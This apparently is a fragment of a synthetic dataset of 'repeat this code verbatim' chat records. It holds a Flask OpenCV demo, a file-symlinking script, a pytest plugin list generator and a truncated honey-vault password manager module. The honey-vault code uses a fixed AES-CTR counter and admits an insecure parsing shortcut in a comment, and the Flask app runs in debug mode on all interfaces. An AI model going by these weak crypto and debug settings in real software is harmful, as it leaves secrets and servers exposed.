mimetype='image/png')\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\[email protected](403)\ndef not_authorized():\n message = {\n 'status': 403,\n 'message': 'Not authorized: ' + request.url,\n }\n response = jsonify(message)\n response.status_code = 403\n return response\n\n\[email protected](404)\ndef not_found(error=None):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n response = jsonify(message)\n response.status_code = 404\n return response\n\n\[email protected]('/static/<path:path>')\ndef send_web(path):\n return send_from_directory('static', path)\n\n\[email protected](500)\ndef internal_error(exception):\n app.logger.error(exception)\n return render_template('500.html'), 500\n\n\[email protected](400)\ndef internal_error(exception):\n app.logger.exception(\"Error: %s\", exception)\n return render_template('400.html'), 500\n\n\ndef configure_logging():\n namespace = {}\n namespace['base_dir'] = os.path.abspath(os.path.dirname(__file__))\n namespace['logfile'] = os.path.join(namespace['base_dir'], \"flask-example.log\")\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n rotating_file_handler = RotatingFileHandler(namespace['logfile'], maxBytes=10000, backupCount=20)\n rotating_file_handler.setLevel(logging.DEBUG)\n console_stream_handler = logging.StreamHandler()\n console_stream_handler.setLevel(logging.DEBUG if namespace.get('debug') else logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n console_stream_handler.setFormatter(formatter)\n rotating_file_handler.setFormatter(formatter)\n logger.addHandler(console_stream_handler)\n logger.addHandler(rotating_file_handler)\n return logger, rotating_file_handler, console_stream_handler\n\n\nif __name__ == '__main__':\n logger, file_handler, stream_handler = configure_logging()\n app.logger.addHandler(file_handler)\n app.logger.addHandler(stream_handler)\n app.run(\n host=\"0.0.0.0\",\n port=int(\"8001\"),\n )\n```\nRepeat the above code.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#!/usr/bin/env python\n\n\nfrom __future__ import unicode_literals, print_function\n\nimport logging\nimport os\nfrom StringIO import StringIO\nfrom logging.handlers import RotatingFileHandler\n\nimport cv2\nfrom PIL import Image\nfrom flask import Flask, make_response, request, send_from_directory, jsonify, render_template, send_file\n\napp = Flask(__name__, static_url_path='')\napp.config.update(\n DEBUG=True,\n)\n\n# Generate a secret random key for the session\napp.secret_key = os.urandom(24)\n\n\[email protected]('/')\ndef index(name=None):\n return render_template('index.html', name=name)\n\n\[email protected]('/canny')\ndef canny():\n # adapted from https://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_canny/py_canny.html#canny\n img = cv2.imread('static/img/ship.jpg', 0)\n edges = cv2.Canny(img, 100, 200)\n im = Image.fromarray(edges)\n img2 = StringIO()\n im.save(img2, format=\"png\")\n img2.seek(0)\n return send_file(img2, mimetype='image/png')\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\[email protected](403)\ndef not_authorized():\n message = {\n 'status': 403,\n 'message': 'Not authorized: ' + request.url,\n }\n response = jsonify(message)\n response.status_code = 403\n return response\n\n\[email protected](404)\ndef not_found(error=None):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n response = jsonify(message)\n response.status_code = 404\n return response\n\n\[email protected]('/static/<path:path>')\ndef send_web(path):\n return send_from_directory('static', path)\n\n\[email protected](500)\ndef internal_error(exception):\n app.logger.error(exception)\n return render_template('500.html'), 500\n\n\[email protected](400)\ndef internal_error(exception):\n app.logger.exception(\"Error: %s\", exception)\n return render_template('400.html'), 500\n\n\ndef configure_logging():\n namespace = {}\n namespace['base_dir'] = os.path.abspath(os.path.dirname(__file__))\n namespace['logfile'] = os.path.join(namespace['base_dir'], \"flask-example.log\")\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n rotating_file_handler = RotatingFileHandler(namespace['logfile'], maxBytes=10000, backupCount=20)\n rotating_file_handler.setLevel(logging.DEBUG)\n console_stream_handler = logging.StreamHandler()\n console_stream_handler.setLevel(logging.DEBUG if namespace.get('debug') else logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n console_stream_handler.setFormatter(formatter)\n rotating_file_handler.setFormatter(formatter)\n logger.addHandler(console_stream_handler)\n logger.addHandler(rotating_file_handler)\n return logger, rotating_file_handler, console_stream_handler\n\n\nif __name__ == '__main__':\n logger, file_handler, stream_handler = configure_logging()\n app.logger.addHandler(file_handler)\n app.logger.addHandler(stream_handler)\n app.run(\n host=\"0.0.0.0\",\n port=int(\"8001\"),\n )\n```<|memory_end|>\nRepeat the above code.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
from __future__ import unicode_literals, print_function
import logging
import os
from StringIO import StringIO
from logging.handlers import RotatingFileHandler
import cv2
from PIL import Image
from flask import Flask, make_response, request, send_from_directory, jsonify, render_template, send_file
app = Flask(__name__, static_url_path='')
app.config.update(
DEBUG=True,
)
# Generate a secret random key for the session
app.secret_key = os.urandom(24)
@app.route('/')
def index(name=None):
return render_template('index.html', name=name)
@app.route('/canny')
def canny():
# adapted from https://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_canny/py_canny.html#canny
img = cv2.imread('static/img/ship.jpg', 0)
edges = cv2.Canny(img, 100, 200)
im = Image.fromarray(edges)
img2 = StringIO()
im.save(img2, format="png")
img2.seek(0)
return send_file(img2, mimetype='image/png')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.errorhandler(403)
def not_authorized():
message = {
'status': 403,
'message': 'Not authorized: ' + request.url,
}
response = jsonify(message)
response.status_code = 403
return response
@app.errorhandler(404)
def not_found(error=None):
message = {
'status': 404,
'message': 'Not Found: ' + request.url,
}
response = jsonify(message)
response.status_code = 404
return response
@app.route('/static/<path:path>')
def send_web(path):
return send_from_directory('static', path)
@app.errorhandler(500)
def internal_error(exception):
app.logger.error(exception)
return render_template('500.html'), 500
@app.errorhandler(400)
def internal_error(exception):
app.logger.exception("Error: %s", exception)
return render_template('400.html'), 500
def configure_logging():
namespace = {}
namespace['base_dir'] = os.path.abspath(os.path.dirname(__file__))
namespace['logfile'] = os.path.join(namespace['base_dir'], "flask-example.log")
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
rotating_file_handler = RotatingFileHandler(namespace['logfile'], maxBytes=10000, backupCount=20)
rotating_file_handler.setLevel(logging.DEBUG)
console_stream_handler = logging.StreamHandler()
console_stream_handler.setLevel(logging.DEBUG if namespace.get('debug') else logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console_stream_handler.setFormatter(formatter)
rotating_file_handler.setFormatter(formatter)
logger.addHandler(console_stream_handler)
logger.addHandler(rotating_file_handler)
return logger, rotating_file_handler, console_stream_handler
if __name__ == '__main__':
logger, file_handler, stream_handler = configure_logging()
app.logger.addHandler(file_handler)
app.logger.addHandler(stream_handler)
app.run(
host="0.0.0.0",
port=int("8001"),
)
```
|
[
{
"content": "Reconstruct the code file line-for-line, unmodified:\n```python\n#!/usr/bin/env python3\n\"\"\"\nRecursively link all files.\n\"\"\"\n\nimport argparse\nimport glob\nimport os\nimport signal\nimport sys\nfrom typing import List\n\nimport file_mod\n\n\nclass Options:\n \"\"\"\n Options class\n \"\"\"\n\n def __init__(self) -> None:\n self._args: argparse.Namespace = None\n self.parse(sys.argv)\n\n def get_directories(self) -> List[str]:\n \"\"\"\n Return list of directories.\n \"\"\"\n return self._args.directories\n\n def _parse_args(self, args: List[str]) -> None:\n parser = argparse.ArgumentParser(\n description='Recursively link all files.',\n )\n\n parser.add_argument(\n 'directories',\n nargs='+',\n metavar='directory',\n help='Directory containing files to link.'\n )\n\n self._args = parser.parse_args(args)\n\n for directory in self._args.directories:\n if not os.path.isdir(directory):\n raise SystemExit(\n sys.argv[0] + ': Source directory \"' + directory +\n '\" does not exist.'\n )\n if os.path.samefile(directory, os.getcwd()):\n raise SystemExit(\n sys.argv[0] + ': Source directory \"' + directory +\n '\" cannot be current directory.'\n )\n\n def parse(self, args: List[str]) -> None:\n \"\"\"\n Parse arguments\n \"\"\"\n self._parse_args(args[1:])\n\n\nclass Main:\n \"\"\"\n Main class\n \"\"\"\n\n def __init__(self) -> None:\n try:\n self.config()\n sys.exit(self.run())\n except (EOFError, KeyboardInterrupt):\n sys.exit(114)\n except SystemExit as exception:\n sys.exit(exception)\n\n @staticmethod\n def config() -> None:\n \"\"\"\n Configure program\n \"\"\"\n if hasattr(signal, 'SIGPIPE'):\n signal.signal(signal.SIGPIPE, signal.SIG_DFL)\n if os.name == 'nt':\n argv = []\n for arg in sys.argv:\n files = glob.glob(arg) # Fixes Windows globbing bug\n if files:\n argv.extend(files)\n else:\n argv.append(arg)\n sys.argv = argv\n\n def _link_files(\n self,\n source_dir: str,\n target_dir: str,\n subdir: str = '',\n ) -> None:\n try:\n source_files = sorted([\n os.path.join(source_dir, x)\n for x in os.listdir(source_dir)\n ])\n except PermissionError:\n return\n if not os.path.isdir(target_dir):\n print('Creating \"' + target_dir + '\" directory...')\n try:\n os.mkdir(target_dir)\n except OSError as exception:\n raise SystemExit(\n sys.argv[0] + ': Cannot create \"' + target_dir +\n '\" directory.'\n ) from exception\n\n for source_file in sorted(source_files):\n target_file = os.path.join(\n target_dir,\n os.path.basename(source_file)\n )\n if os.path.isdir(source_file):\n self._link_files(\n source_file,\n target_file,\n os.path.join(os.pardir, subdir)\n )\n else:\n if os.path.islink(target_file):\n print('Updating \"' + target_file + '\" link...')\n try:\n os.remove(target_file)\n except OSError as exception:\n raise SystemExit(\n sys.argv[0] + ': Cannot remove \"' + target_file +\n '\" link.'\n ) from exception\n else:\n print('Creating \"' + target_file + '\" link...')\n if os.path.isabs(source_file):\n file = source_file\n else:\n file = os.path.join(subdir, source_file)\n try:\n os.symlink(file, target_file)\n except OSError as exception:\n raise SystemExit(\n sys.argv[0] + ': Cannot create \"' +\n target_file + '\" link.'\n ) from exception\n file_stat = file_mod.FileStat(file)\n file_time = file_stat.get_time()\n os.utime(\n target_file,\n (file_time, file_time),\n follow_symlinks=False,\n )\n\n def run(self) -> int:\n \"\"\"\n Start program\n \"\"\"\n options = Options()\n\n for directory in options.get_directories():\n self._link_files(directory, '.')\n\n return 0\n\n\nif '--pydoc' in sys.argv:\n help(__name__)\nelse:\n Main()\n```",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code file line-for-line, unmodified:\n<|memory_start|>```python\n#!/usr/bin/env python3\n\"\"\"\nRecursively link all files.\n\"\"\"\n\nimport argparse\nimport glob\nimport os\nimport signal\nimport sys\nfrom typing import List\n\nimport file_mod\n\n\nclass Options:\n \"\"\"\n Options class\n \"\"\"\n\n def __init__(self) -> None:\n self._args: argparse.Namespace = None\n self.parse(sys.argv)\n\n def get_directories(self) -> List[str]:\n \"\"\"\n Return list of directories.\n \"\"\"\n return self._args.directories\n\n def _parse_args(self, args: List[str]) -> None:\n parser = argparse.ArgumentParser(\n description='Recursively link all files.',\n )\n\n parser.add_argument(\n 'directories',\n nargs='+',\n metavar='directory',\n help='Directory containing files to link.'\n )\n\n self._args = parser.parse_args(args)\n\n for directory in self._args.directories:\n if not os.path.isdir(directory):\n raise SystemExit(\n sys.argv[0] + ': Source directory \"' + directory +\n '\" does not exist.'\n )\n if os.path.samefile(directory, os.getcwd()):\n raise SystemExit(\n sys.argv[0] + ': Source directory \"' + directory +\n '\" cannot be current directory.'\n )\n\n def parse(self, args: List[str]) -> None:\n \"\"\"\n Parse arguments\n \"\"\"\n self._parse_args(args[1:])\n\n\nclass Main:\n \"\"\"\n Main class\n \"\"\"\n\n def __init__(self) -> None:\n try:\n self.config()\n sys.exit(self.run())\n except (EOFError, KeyboardInterrupt):\n sys.exit(114)\n except SystemExit as exception:\n sys.exit(exception)\n\n @staticmethod\n def config() -> None:\n \"\"\"\n Configure program\n \"\"\"\n if hasattr(signal, 'SIGPIPE'):\n signal.signal(signal.SIGPIPE, signal.SIG_DFL)\n if os.name == 'nt':\n argv = []\n for arg in sys.argv:\n files = glob.glob(arg) # Fixes Windows globbing bug\n if files:\n argv.extend(files)\n else:\n argv.append(arg)\n sys.argv = argv\n\n def _link_files(\n self,\n source_dir: str,\n target_dir: str,\n subdir: str = '',\n ) -> None:\n try:\n source_files = sorted([\n os.path.join(source_dir, x)\n for x in os.listdir(source_dir)\n ])\n except PermissionError:\n return\n if not os.path.isdir(target_dir):\n print('Creating \"' + target_dir + '\" directory...')\n try:\n os.mkdir(target_dir)\n except OSError as exception:\n raise SystemExit(\n sys.argv[0] + ': Cannot create \"' + target_dir +\n '\" directory.'\n ) from exception\n\n for source_file in sorted(source_files):\n target_file = os.path.join(\n target_dir,\n os.path.basename(source_file)\n )\n if os.path.isdir(source_file):\n self._link_files(\n source_file,\n target_file,\n os.path.join(os.pardir, subdir)\n )\n else:\n if os.path.islink(target_file):\n print('Updating \"' + target_file + '\" link...')\n try:\n os.remove(target_file)\n except OSError as exception:\n raise SystemExit(\n sys.argv[0] + ': Cannot remove \"' + target_file +\n '\" link.'\n ) from exception\n else:\n print('Creating \"' + target_file + '\" link...')\n if os.path.isabs(source_file):\n file = source_file\n else:\n file = os.path.join(subdir, source_file)\n try:\n os.symlink(file, target_file)\n except OSError as exception:\n raise SystemExit(\n sys.argv[0] + ': Cannot create \"' +\n target_file + '\" link.'\n ) from exception\n file_stat = file_mod.FileStat(file)\n file_time = file_stat.get_time()\n os.utime(\n target_file,\n (file_time, file_time),\n follow_symlinks=False,\n )\n\n def run(self) -> int:\n \"\"\"\n Start program\n \"\"\"\n options = Options()\n\n for directory in options.get_directories():\n self._link_files(directory, '.')\n\n return 0\n\n\nif '--pydoc' in sys.argv:\n help(__name__)\nelse:\n Main()\n```<|memory_end|>",
"role": "user"
}
] |
```python
#!/usr/bin/env python3
"""
Recursively link all files.
"""
import argparse
import glob
import os
import signal
import sys
from typing import List
import file_mod
class Options:
"""
Options class
"""
def __init__(self) -> None:
self._args: argparse.Namespace = None
self.parse(sys.argv)
def get_directories(self) -> List[str]:
"""
Return list of directories.
"""
return self._args.directories
def _parse_args(self, args: List[str]) -> None:
parser = argparse.ArgumentParser(
description='Recursively link all files.',
)
parser.add_argument(
'directories',
nargs='+',
metavar='directory',
help='Directory containing files to link.'
)
self._args = parser.parse_args(args)
for directory in self._args.directories:
if not os.path.isdir(directory):
raise SystemExit(
sys.argv[0] + ': Source directory "' + directory +
'" does not exist.'
)
if os.path.samefile(directory, os.getcwd()):
raise SystemExit(
sys.argv[0] + ': Source directory "' + directory +
'" cannot be current directory.'
)
def parse(self, args: List[str]) -> None:
"""
Parse arguments
"""
self._parse_args(args[1:])
class Main:
"""
Main class
"""
def __init__(self) -> None:
try:
self.config()
sys.exit(self.run())
except (EOFError, KeyboardInterrupt):
sys.exit(114)
except SystemExit as exception:
sys.exit(exception)
@staticmethod
def config() -> None:
"""
Configure program
"""
if hasattr(signal, 'SIGPIPE'):
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
if os.name == 'nt':
argv = []
for arg in sys.argv:
files = glob.glob(arg) # Fixes Windows globbing bug
if files:
argv.extend(files)
else:
argv.append(arg)
sys.argv = argv
def _link_files(
self,
source_dir: str,
target_dir: str,
subdir: str = '',
) -> None:
try:
source_files = sorted([
os.path.join(source_dir, x)
for x in os.listdir(source_dir)
])
except PermissionError:
return
if not os.path.isdir(target_dir):
print('Creating "' + target_dir + '" directory...')
try:
os.mkdir(target_dir)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot create "' + target_dir +
'" directory.'
) from exception
for source_file in sorted(source_files):
target_file = os.path.join(
target_dir,
os.path.basename(source_file)
)
if os.path.isdir(source_file):
self._link_files(
source_file,
target_file,
os.path.join(os.pardir, subdir)
)
else:
if os.path.islink(target_file):
print('Updating "' + target_file + '" link...')
try:
os.remove(target_file)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot remove "' + target_file +
'" link.'
) from exception
else:
print('Creating "' + target_file + '" link...')
if os.path.isabs(source_file):
file = source_file
else:
file = os.path.join(subdir, source_file)
try:
os.symlink(file, target_file)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot create "' +
target_file + '" link.'
) from exception
file_stat = file_mod.FileStat(file)
file_time = file_stat.get_time()
os.utime(
target_file,
(file_time, file_time),
follow_symlinks=False,
)
def run(self) -> int:
"""
Start program
"""
options = Options()
for directory in options.get_directories():
self._link_files(directory, '.')
return 0
if '--pydoc' in sys.argv:
help(__name__)
else:
Main()
```
|
[
{
"content": "Provide a verbatim copy of the code:\n```python\nimport datetime\nimport pathlib\nimport re\n\nimport packaging.version\nimport requests\nimport tabulate\n\nFILE_HEAD = r\"\"\"Plugins List\n============\n\nPyPI projects that match \"pytest-\\*\" are considered plugins and are listed\nautomatically. Packages classified as inactive are excluded.\n\"\"\"\nDEVELOPMENT_STATUS_CLASSIFIERS = (\n \"Development Status :: 1 - Planning\",\n \"Development Status :: 2 - Pre-Alpha\",\n \"Development Status :: 3 - Alpha\",\n \"Development Status :: 4 - Beta\",\n \"Development Status :: 5 - Production/Stable\",\n \"Development Status :: 6 - Mature\",\n \"Development Status :: 7 - Inactive\",\n)\n\n\ndef iter_plugins():\n regex = r\">([\\d\\w-]*)</a>\"\n response = requests.get(\"https://pypi.org/simple\")\n for match in re.finditer(regex, response.text):\n name = match.groups()[0]\n if not name.startswith(\"pytest-\"):\n continue\n response = requests.get(f\"https://pypi.org/pypi/{name}/json\")\n if response.status_code == 404:\n # Some packages, like pytest-azurepipelines42, are included in https://pypi.org/simple but\n # return 404 on the JSON API. Skip.\n continue\n response.raise_for_status()\n info = response.json()[\"info\"]\n if \"Development Status :: 7 - Inactive\" in info[\"classifiers\"]:\n continue\n for classifier in DEVELOPMENT_STATUS_CLASSIFIERS:\n if classifier in info[\"classifiers\"]:\n status = classifier[22:]\n break\n else:\n status = \"N/A\"\n requires = \"N/A\"\n if info[\"requires_dist\"]:\n for requirement in info[\"requires_dist\"]:\n if requirement == \"pytest\" or \"pytest \" in requirement:\n requires = requirement\n break\n releases = response.json()[\"releases\"]\n for release in sorted(releases, key=packaging.version.parse, reverse=True):\n if releases[release]:\n release_date = datetime.date.fromisoformat(\n releases[release][-1][\"upload_time_iso_8601\"].split(\"T\")[0]\n )\n last_release = release_date.strftime(\"%b %d, %Y\")\n break\n name = f'`{info[\"name\"]} <{info[\"project_url\"]}>`_'\n summary = info[\"summary\"].replace(\"\\n\", \"\")\n summary = re.sub(r\"_\\b\", \"\", summary)\n yield {\n \"name\": name,\n \"summary\": summary,\n \"last release\": last_release,\n \"status\": status,\n \"requires\": requires,\n }\n\n\ndef main():\n plugins = list(iter_plugins())\n plugin_table = tabulate.tabulate(plugins, headers=\"keys\", tablefmt=\"rst\")\n plugin_list = pathlib.Path(\"doc\", \"en\", \"plugin_list.rst\")\n with plugin_list.open(\"w\") as f:\n f.write(FILE_HEAD)\n f.write(f\"This list contains {len(plugins)} plugins.\\n\\n\")\n f.write(plugin_table)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n```\nDo not paraphrase.",
"role": "user"
}
] |
[
{
"content": "Provide a verbatim copy of the code:\n<|memory_start|>```python\nimport datetime\nimport pathlib\nimport re\n\nimport packaging.version\nimport requests\nimport tabulate\n\nFILE_HEAD = r\"\"\"Plugins List\n============\n\nPyPI projects that match \"pytest-\\*\" are considered plugins and are listed\nautomatically. Packages classified as inactive are excluded.\n\"\"\"\nDEVELOPMENT_STATUS_CLASSIFIERS = (\n \"Development Status :: 1 - Planning\",\n \"Development Status :: 2 - Pre-Alpha\",\n \"Development Status :: 3 - Alpha\",\n \"Development Status :: 4 - Beta\",\n \"Development Status :: 5 - Production/Stable\",\n \"Development Status :: 6 - Mature\",\n \"Development Status :: 7 - Inactive\",\n)\n\n\ndef iter_plugins():\n regex = r\">([\\d\\w-]*)</a>\"\n response = requests.get(\"https://pypi.org/simple\")\n for match in re.finditer(regex, response.text):\n name = match.groups()[0]\n if not name.startswith(\"pytest-\"):\n continue\n response = requests.get(f\"https://pypi.org/pypi/{name}/json\")\n if response.status_code == 404:\n # Some packages, like pytest-azurepipelines42, are included in https://pypi.org/simple but\n # return 404 on the JSON API. Skip.\n continue\n response.raise_for_status()\n info = response.json()[\"info\"]\n if \"Development Status :: 7 - Inactive\" in info[\"classifiers\"]:\n continue\n for classifier in DEVELOPMENT_STATUS_CLASSIFIERS:\n if classifier in info[\"classifiers\"]:\n status = classifier[22:]\n break\n else:\n status = \"N/A\"\n requires = \"N/A\"\n if info[\"requires_dist\"]:\n for requirement in info[\"requires_dist\"]:\n if requirement == \"pytest\" or \"pytest \" in requirement:\n requires = requirement\n break\n releases = response.json()[\"releases\"]\n for release in sorted(releases, key=packaging.version.parse, reverse=True):\n if releases[release]:\n release_date = datetime.date.fromisoformat(\n releases[release][-1][\"upload_time_iso_8601\"].split(\"T\")[0]\n )\n last_release = release_date.strftime(\"%b %d, %Y\")\n break\n name = f'`{info[\"name\"]} <{info[\"project_url\"]}>`_'\n summary = info[\"summary\"].replace(\"\\n\", \"\")\n summary = re.sub(r\"_\\b\", \"\", summary)\n yield {\n \"name\": name,\n \"summary\": summary,\n \"last release\": last_release,\n \"status\": status,\n \"requires\": requires,\n }\n\n\ndef main():\n plugins = list(iter_plugins())\n plugin_table = tabulate.tabulate(plugins, headers=\"keys\", tablefmt=\"rst\")\n plugin_list = pathlib.Path(\"doc\", \"en\", \"plugin_list.rst\")\n with plugin_list.open(\"w\") as f:\n f.write(FILE_HEAD)\n f.write(f\"This list contains {len(plugins)} plugins.\\n\\n\")\n f.write(plugin_table)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n```<|memory_end|>\nDo not paraphrase.",
"role": "user"
}
] |
```python
import datetime
import pathlib
import re
import packaging.version
import requests
import tabulate
FILE_HEAD = r"""Plugins List
============
PyPI projects that match "pytest-\*" are considered plugins and are listed
automatically. Packages classified as inactive are excluded.
"""
DEVELOPMENT_STATUS_CLASSIFIERS = (
"Development Status :: 1 - Planning",
"Development Status :: 2 - Pre-Alpha",
"Development Status :: 3 - Alpha",
"Development Status :: 4 - Beta",
"Development Status :: 5 - Production/Stable",
"Development Status :: 6 - Mature",
"Development Status :: 7 - Inactive",
)
def iter_plugins():
regex = r">([\d\w-]*)</a>"
response = requests.get("https://pypi.org/simple")
for match in re.finditer(regex, response.text):
name = match.groups()[0]
if not name.startswith("pytest-"):
continue
response = requests.get(f"https://pypi.org/pypi/{name}/json")
if response.status_code == 404:
# Some packages, like pytest-azurepipelines42, are included in https://pypi.org/simple but
# return 404 on the JSON API. Skip.
continue
response.raise_for_status()
info = response.json()["info"]
if "Development Status :: 7 - Inactive" in info["classifiers"]:
continue
for classifier in DEVELOPMENT_STATUS_CLASSIFIERS:
if classifier in info["classifiers"]:
status = classifier[22:]
break
else:
status = "N/A"
requires = "N/A"
if info["requires_dist"]:
for requirement in info["requires_dist"]:
if requirement == "pytest" or "pytest " in requirement:
requires = requirement
break
releases = response.json()["releases"]
for release in sorted(releases, key=packaging.version.parse, reverse=True):
if releases[release]:
release_date = datetime.date.fromisoformat(
releases[release][-1]["upload_time_iso_8601"].split("T")[0]
)
last_release = release_date.strftime("%b %d, %Y")
break
name = f'`{info["name"]} <{info["project_url"]}>`_'
summary = info["summary"].replace("\n", "")
summary = re.sub(r"_\b", "", summary)
yield {
"name": name,
"summary": summary,
"last release": last_release,
"status": status,
"requires": requires,
}
def main():
plugins = list(iter_plugins())
plugin_table = tabulate.tabulate(plugins, headers="keys", tablefmt="rst")
plugin_list = pathlib.Path("doc", "en", "plugin_list.rst")
with plugin_list.open("w") as f:
f.write(FILE_HEAD)
f.write(f"This list contains {len(plugins)} plugins.\n\n")
f.write(plugin_table)
f.write("\n")
if __name__ == "__main__":
main()
```
|
[
{
"content": "```python\nimport json\nimport math\nimport os\nimport sys\n\nBASE_DIR = os.getcwd()\nsys.path.append(BASE_DIR)\nfrom .honey_enc import DTE, DTE_random\nfrom pcfg.pcfg import TrainedGrammar\nimport honeyvault_config as hny_config\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256\nfrom Crypto.Protocol.KDF import PBKDF1\nfrom Crypto.Util import Counter\nimport copy, struct\nfrom helper import (open_, print_err, process_parallel, random,\n print_production)\nfrom pcfg.pcfg import VaultDistPCFG\nfrom collections import OrderedDict\n\n# from IPython.core import ultratb\n# sys.excepthook = ultratb.FormattedTB(color_scheme='Linux', call_pdb=1)\n\nMAX_INT = hny_config.MAX_INT\n\n\n# -------------------------------------------------------------------------------\ndef do_crypto_setup(mp, salt):\n key = PBKDF1(mp, salt, 16, 100, SHA256)\n ctr = Counter.new(128, initial_value=int(254))\n aes = AES.new(key, AES.MODE_CTR, counter=ctr)\n return aes\n\n\ndef copy_from_old_parallel(args):\n odte, ndte, i, p = args\n ret = []\n pw = odte.decode_pw(p)\n if not pw:\n return i, pw, []\n ret = ndte.encode_pw(pw)\n if not ret:\n print(\"Cool I failed in encoding!! Kudos to me. pw: {}, i: {}\"\n .format(pw, i))\n ret = pw\n else:\n tpw = ndte.decode_pw(ret)\n assert pw == tpw, \"Encoding-Decoding password is wrong. Expecting {!r}, got {!r}\"\\\n .format(pw, tpw)\n\n return i, pw, ret\n\n\nclass HoneyVault:\n s1 = hny_config.HONEY_VAULT_S1\n s2 = hny_config.HONEY_VAULT_S2\n s_g = hny_config.HONEY_VAULT_GRAMMAR_SIZE\n s = hny_config.HONEY_VAULT_STORAGE_SIZE\n vault_total_size = hny_config.HONEY_VAULT_ENCODING_SIZE\n sample = [10, 19, 20, 31]\n mpass_set_size = hny_config.HONEY_VAULT_MACHINE_PASS_SET_SIZE\n\n def __init__(self, vault_fl, mp):\n self.pcfg = TrainedGrammar() # Default large trained PCFG\n domain_hash_map_fl = hny_config.STATIC_DOMAIN_HASH_LIST\n self.domain_hash_map = json.load(open_(domain_hash_map_fl))\n self.vault_fl = vault_fl\n self.mp = mp\n self.initialize_vault(mp)\n self.dte = DTE(self.pcfg.decode_grammar(self.H))\n\n def get_domain_index(self, d):\n h = SHA256.new()\n h.update(d.encode('utf-8'))\n d_hash = h.hexdigest()[:32]\n try:\n i = self.domain_hash_map[d_hash]\n if i > self.s1:\n raise KeyError\n else:\n return i\n except KeyError:\n sys.stderr.write('WARNING! S1 miss for %s\\n' % d)\n x = struct.unpack('8I', h.digest())[0]\n return self.s1 + x % self.s2\n\n def initialize_vault(self, mp):\n vd = VaultDistPCFG()\n if not os.path.exists(self.vault_fl):\n print_production(\"\\nCould not find the vault file @ {}, so, sit tight, \" \\\n \"creating a dummy vault for you.\" \\\n \"\\nShould not take too long...\\n\".format(self.vault_fl))\n t_s = random.randints(0, MAX_INT, hny_config.HONEY_VAULT_ENCODING_SIZE)\n self.H = t_s[:hny_config.HONEY_VAULT_GRAMMAR_SIZE]\n t_s = t_s[hny_config.HONEY_VAULT_GRAMMAR_SIZE:]\n self.S = [t_s[i:i + hny_config.PASSWORD_LENGTH]\n for i in range(0, self.s * hny_config.PASSWORD_LENGTH, hny_config.PASSWORD_LENGTH)]\n assert all(len(s) == hny_config.PASSWORD_LENGTH for s in\n self.S), \"All passwords encodings are not of correct length.\\n {}\".format(\n (len(s), hny_config.PASSWORD_LENGTH) for s in self.S)\n self.machine_pass_set = list('0' * (self.mpass_set_size * 8))\n k = int(math.ceil(hny_config.HONEY_VAULT_STORAGE_SIZE * \\\n hny_config.MACHINE_GENRATED_PASS_PROB / 1000.0))\n for i in random.sample(list(range(hny_config.HONEY_VAULT_STORAGE_SIZE)), k):\n self.machine_pass_set[i] = '1'\n self.salt = os.urandom(8)\n self.save(mp)\n else:\n self.load(mp)\n\n def gen_password(self, mp, domain_list, size=10):\n \"\"\"\n generates random password strings for each of the domail\n specified, and saves it in corresponding location.\n Master password (@mp) is required for that.\n \"\"\"\n r_dte = DTE_random()\n reply = []\n for d in domain_list:\n i = self.get_domain_index(d)\n p, encoding = r_dte.generate_and_encode_password(size)\n self.S[i] = encoding\n self.machine_pass_set[i] = '1'\n reply.append(p)\n self.save()\n return OrderedDict(list(zip(domain_list, reply)))\n\n def add_password(self, domain_pw_map):\n # print self.dte.G\n nG = copy.deepcopy(self.dte.G)\n print_production(\"Updating the grammar with new passwords..\")\n nG.update_grammar(*(list(domain_pw_map.values())))\n ndte = DTE(nG)\n\n # TODO: fix this, currently its a hack to way around my bad\n # parsing. A password can be generated in a different way than it is parsed in most probable\n # way. The code is supposed to pick one parse tree at random. Currently picking the most \n # probable one. Need to fix for security reason. Will add a ticket. \n new_encoding_of_old_pw = []\n\n current_passwords = ['' for _ in range(hny_config.HONEY_VAULT_STORAGE_SIZE)]\n\n if self.dte and (ndte != self.dte):\n # if new dte is different then copy the existing human chosen passwords. \n # Machine generated passwords are not necessary to re-encode. As their grammar\n # does not change. NEED TO CHECK SECURITY.\n print_production(\"Some new rules found, so adding them to the new grammar. \" \\\n \"Should not take too long...\\n\")\n data = [(self.dte, ndte, i, p)\n for i, p in enumerate(self.S)\n if self.machine_pass_set[i] == '0']\n if hny_config.DEBUG:\n result = map(copy_from_old_parallel, data)\n else:\n result = process_parallel(copy_from_old_parallel, data, func_load=100)\n\n for i, pw, pw_encodings in result:\n if isinstance(pw_encodings, str):\n new_encoding_of_old_pw.append((i, pw_encodings))\n current_passwords[i] = pw\n self.S[i] = pw_encodings\n\n # print_err(self.H[:10])\n # G_ = self.pcfg.decode_grammar(self.H)\n # print_err(\"-\"*50)\n # print_err(\"Original: \", nG, '\\n', '='*50)\n # print_err(\"After Decoding:\", G_)\n # assert G_ == nG\n\n 